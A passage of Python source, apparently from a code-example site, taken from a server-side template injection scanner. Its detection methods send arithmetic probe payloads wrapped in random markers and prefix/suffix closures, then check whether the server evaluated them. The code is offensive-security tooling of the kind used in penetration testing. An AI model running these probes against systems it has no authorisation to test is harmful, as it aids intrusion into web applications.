                            ' (level %i)' % (ctx.get('level', 1)) if self.get('level') else ''
                    )
            )

            for closure in closures:

                # Format the prefix with closure
                prefix = ctx.get('prefix', '%(closure)s') % ( { 'closure' : closure } )
                if expected == self.inject(
                        payload = payload,
                        header = header,
                        trailer = trailer,
                        header_rand = header_rand,
                        trailer_rand = trailer_rand,
                        prefix = prefix,
                        suffix = suffix
                    ):
                    self.set('render_fmt', self.render_fmt)
                    self.set('header_fmt', self.header_fmt)
                    self.set('trailer_fmt', self.trailer_fmt)
                    self.set('prefix', prefix)
                    self.set('suffix', suffix)

                    return

        log.debug('%s: Injection in code context failed, trying raw payload with no header and trailer' % self.plugin)

        # As last resort, just inject without header and trailer and
        # see if expected is contained in the response page
        result = self.channel.req(payload)
        if result and expected in result:
            self.set('render_fmt', self.render_fmt)
            return
Exemple #49
0
    def _detect_context(self):

        # Prepare base operation to be evalued server-side
        randA = rand.randint_n(1)
        randB = rand.randint_n(1)
        expected = str(randA * randB)

        # Prepare first detection payload and header
        payload = self.render_tag % ({'payload': '%s*%s' % (randA, randB)})
        header_rand = rand.randint_n(3)
        header = self.header_tag % ({'header': header_rand})
        trailer_rand = rand.randint_n(3)
        trailer = self.trailer_tag % ({'trailer': trailer_rand})

        log.debug('%s: Trying to inject in text context' % self.plugin)

        # First probe with payload wrapped by header and trailer, no suffex or prefix
        if expected == self.inject(payload=payload,
                                   header=header,
                                   trailer=trailer,
                                   header_rand=header_rand,
                                   trailer_rand=trailer_rand,
                                   prefix='',
                                   suffix=''):
            self.set('render_tag', self.render_tag)
            self.set('header_tag', self.header_tag)
            self.set('trailer_tag', self.trailer_tag)
            return

        log.debug(
            '%s: Injection in text context failed, trying to inject in code context'
            % self.plugin)

        # If not found, try to inject all the prefix and suffix pairs falling below the level
        for ctx in self.contexts:
            if self.channel.args.get('level') > ctx.get('level', 1):
                break
            if expected == self.inject(payload=payload,
                                       header=header,
                                       trailer=trailer,
                                       header_rand=header_rand,
                                       trailer_rand=trailer_rand,
                                       prefix=ctx.get('prefix', ''),
                                       suffix=ctx.get('suffix', '')):
                self.set('render_tag', self.render_tag)
                self.set('header_tag', self.header_tag)
                self.set('trailer_tag', self.trailer_tag)
                self.set('prefix', ctx.get('prefix', ''))
                self.set('suffix', ctx.get('suffix', ''))

                return

        log.debug(
            '%s: Injection in code context failed, trying to inject only payload with no header'
            % self.plugin)

        # As last resort, just inject without header and trailer and
        # see if expected is contained in the response page
        if expected in self.inject(payload=payload,
                                   header='',
                                   trailer='',
                                   header_rand=0,
                                   trailer_rand=0,
                                   prefix='',
                                   suffix=''):
            self.set('render_tag', self.render_tag)
            return